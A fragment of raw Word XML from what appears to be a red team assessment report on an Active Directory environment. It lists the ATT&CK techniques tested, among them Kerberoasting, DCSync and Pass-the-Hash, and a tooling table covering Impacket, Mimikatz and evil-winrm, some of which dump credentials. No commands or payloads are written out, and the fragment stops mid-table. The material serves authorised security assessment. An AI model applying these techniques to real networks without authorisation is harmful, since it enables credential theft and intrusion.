            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="46F4681A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Red Team Assessment Station</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28AB2A6C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Table 1: Target Environment Host Details and Scope Demarcation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49872EE6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="621F1A33" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Literature and Tooling Review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3CFEE7" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.1 Security Standards &amp; Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650BBEBB" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To ensure a rigorous, standardized approach to penetration testing and vulnerability analysis, the Red Team assessment was guided by globally recognized cybersecurity standards and security benchmarks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA0EB78" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Enterprise Matrix: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A globally-accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations. Key techniques evaluated in this assessment include T1068 (Exploitation for Privilege Escalation), T1558.003 (Kerberoasting), T1003.006 (DCSync), T1550.002 (Pass-the-Hash), T1078 (Valid Accounts), T1021.006 (Windows Remote Management), and T1552.001 (Credentials in Files).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7624C6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CIS Benchmarks for Active Directory &amp; Windows Server: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Provides prescriptive, consensus-based security configuration guidance for Windows Server and Active Directory. Recommendations regarding service account password policies, LSA protection, and Object Access Control Lists (ACLs) directly informed our post-exploitation analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D9307" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST SP 800-115 &amp; PTES Standard: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Defines standardized technical phases for information security assessments, including Planning, Execution, Post-Exploitation, and Reporting. This framework ensured systematic documentation throughout the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DFF616" w14:textId="77777777" w:rsidR="00B33193" w:rsidRPr="00A61A4C" w:rsidRDefault="00B33193">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AE37E0" w14:textId="54233CCA" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.2 Red Team Tooling Selection &amp; Rationale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A27F63" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>The Red Team selected a specialized suite of open-source security tools for network enumeration, Active Directory graph analysis, credential harvesting, Kerberos ticket manipulation, and remote command execution. Table 2 details the tooling selection rationale:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="2592"/>
        <w:gridCol w:w="4608"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00B33193" w14:paraId="6C175FAB" w14:textId="77777777" w:rsidTr="00EF73F6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="01FDF247" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Tool Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="06444445" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Primary Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="03FBC092" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Operational Rationale &amp; Functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00B33193" w14:paraId="7D7376C1" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="57BE0E5F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>NetExec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>nxc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="313A30FF" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>Network &amp; SMB/WinRM Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2076825A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>Rapid SMB/WinRM authentication verification, share enumeration, spidering, and service discovery.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00B33193" w14:paraId="2CDFDA8B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="519FD5EE" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>BloodHound</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> &amp; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>bloodyAD</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7BDEE333" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>AD Graph &amp; ACL Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30BF1044" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>Ingestion of AD LDAP data to visualize hidden ACL paths (ForceChangePassword, GenericWrite, GenericAll).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00B33193" w14:paraId="72E3A72D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="22CFD82C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>evil-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>winrm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1AA4C303" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>WinRM Remote Shell Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3DDA1851" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>Command-line administration and shell interaction over Windows Remote Management (Port 5985/5986).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00B33193" w14:paraId="331851A0" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="22915BB1" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Impacket</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3D774FF8" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>Python AD Protocol Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2543BF8D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>Includes GetUserSPNs.py (Kerberoasting) and secretsdump.py (DCSync replication and SAM/LSA dumping).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00B33193" w14:paraId="22C5E2A9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="470032F4" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6DAF8D95" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>LSASS &amp; Memory Credential Dumper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="02D79042" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>Used on-target to extract cleartext autologon credentials and LSA secrets from Windows registry memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00B33193" w14:paraId="42C11538" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1C952718" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00B33193" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B33193">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Hashcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
